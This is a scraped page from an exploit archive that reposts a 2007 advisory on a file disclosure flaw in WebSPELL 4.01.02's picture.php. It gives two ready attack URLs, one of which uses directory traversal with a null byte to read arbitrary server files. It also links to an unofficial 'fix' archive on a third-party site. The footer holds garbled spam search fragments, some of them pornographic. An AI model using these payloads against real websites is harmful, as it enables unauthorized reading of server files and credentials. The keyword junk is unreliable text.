about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , WebSPELL <= 4.01.02 (picture.php) File Disclosure Vulnerability



2007-04-06 WebSPELL <= 4.01.02 (picture.php) File Disclosure Vulnerability
Rated as : Moderate Risk

# WebSPELL <= 4.01.02 (picture.php) Remote File Disclosure
Vulnerability
# Discovered by: Trex
# Visit: www.Trex-Online.net / www.UnderGround.ag
# Comment: Happy easter!
#
#   ___     ___
#  /   \   /   \       ___________________________
# /   / \_/ \   \     /                           \
# \__/\     /\__/    /  GIVE ME A CARROT OR I WILL \
#      \O O/         \      BLOW UP YOUR HOUSE     /
#   ___/ ^ \___      / ___________________________/
#      \___/        /_/
#      _/ \_
#   __//   \\__
#  /___\/_\/___\
#
#
#
# Vulnerability 1:
# Advantage: works independently from PHP version.
# Disadvantage: works dependently from PHP option register_globals (=
on).
#
# http://[SITE][PAHT]/picture.php?file=[FILE]
#
#
#
# Vulnerability 2:
# Advantage: works independently from PHP option register_globals.
# Disadvantage: works dependently from PHP versions (< 4.3.0).
#
# http://[SITE][PAHT]/picture.php?id=../../../[FILE]%00
#
#
#
# Solution:
# http://fixes.trex-online.net/picture.rar
securitydot.net - 2007-04-06

Advertising

Copyright 2007, SecurityDot
Mon, 23 Nov 2009 13:02:19 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
news for c Nude karee 200 /compo /search/ex Openssl NT Null Se vBulletin =.../tits. 200 /compo www.sqjfzx Seximages www.blue.f Trisha bat connect sendmail 8 7936.www.e Www.ps2che php-nuke 2 com_bayesi gadis bugi gadis bugi FAKING www.5166wz a...2Fquee ip-97-74-5 Hello, nic Www.ps2che sxe inject Www.Sexse. arabik.sex sztaoli168 88796.com. xxxpower www.3boy2g www.388ys. sxse film obscene Www.Sexse. M...ard.ph -2-All Bro 726 90.cityzen tiny_mce 0082 HINDI MUVI szchunbao. WWWPINKWOR www.avizon china gril CMS is Fre